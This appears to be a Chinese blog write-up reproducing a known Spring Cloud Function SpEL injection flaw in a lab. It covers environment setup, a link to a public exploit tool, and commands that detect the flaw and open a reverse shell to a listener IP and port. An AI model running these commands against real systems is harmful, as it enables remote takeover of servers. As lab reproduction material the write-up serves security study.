【Nday】Spring-Cloud-SpEL-表达式注入漏洞复现
2024-10-21 22:52:01
# 环境搭建
JDK 15下载:
https://www.oracle.com/java/technologies/javase/jdk15-archive-downloads.html
在CentOS7上安装JDK 15环境
rpm -ivh jdk-15.0.2_linux-x64_bin.rpm
漏洞环境下载:
https://github.com/N1ce759/Spring-Cloud-Function-SPEL-RCE
部署漏洞环境:
java -jar SpringCloud-Function-0.0.1-SNAPSHOT.jar
# 漏洞复现
访问:http://192.168.160.146:9000/
工具下载地址:
https://github.com/chaosec2021/Spring-cloud-function-SpEL-RCE
开始检测漏洞并反弹shell
## 检测漏洞
python3 Spel_RCE_POC.py url.txt
## 反弹shell
python3 Spel_RCE_Bash_EXP.py http://192.168.160.146:9000/ 192.168.160.241 7777
最新文章
- hash表C语言实现
- c#-1 数据结构 定义相关 界面交互数据 Model层
- FFT的物理意义
- oracle数据库启动
- php Session存储到Redis的方法
- shell和bat 监控进程,自动关机
- mysql and 和 or 的 优先级和 查询问题
- 转:python webdriver 环境搭建
- ubuntu 状态栏不显示时间
- 操作系统是怎么工作的——mykernel环境的搭建
- CF_402D Upgrading Array 因式分解
- python乱码处理
- MyBatis完全使用指南
- Linux学习3——磁盘文件管理系统与压缩和打包操作
- JVM调优总结(十)-调优方法
- mysql创建数据表时如何判断是否已经存在?
- 警示:AL32UTF8字符集不是ZHS16GBK字符集的超集
- 关于Fragment里面嵌套fragment
- (23/24) webpack实战技巧:如何在webpack环境中使用Json
- 背水一战 Windows 10 (110) - 通知(Tile): secondary tile 模板之基础, secondary tile 模板之文本
热门文章
- MYSQL启动:'服务没有相应控制功能'问题解决
- C++——第三方插件
- 「SOL」Quick Tortoise (Codeforces)
- 关于protobuf报错'tr1/unordered_map' file not found
- 树莓派 Zero W 安装 apache2 + php
- Vue2 element-ui组件二封-表单组件-效果展示
- (Yocto)Imx8mp的时间结构
- CMMI审核期间的主要流程
- 登录他人mysql
- leedcode题目 :罗马数字转整数 Java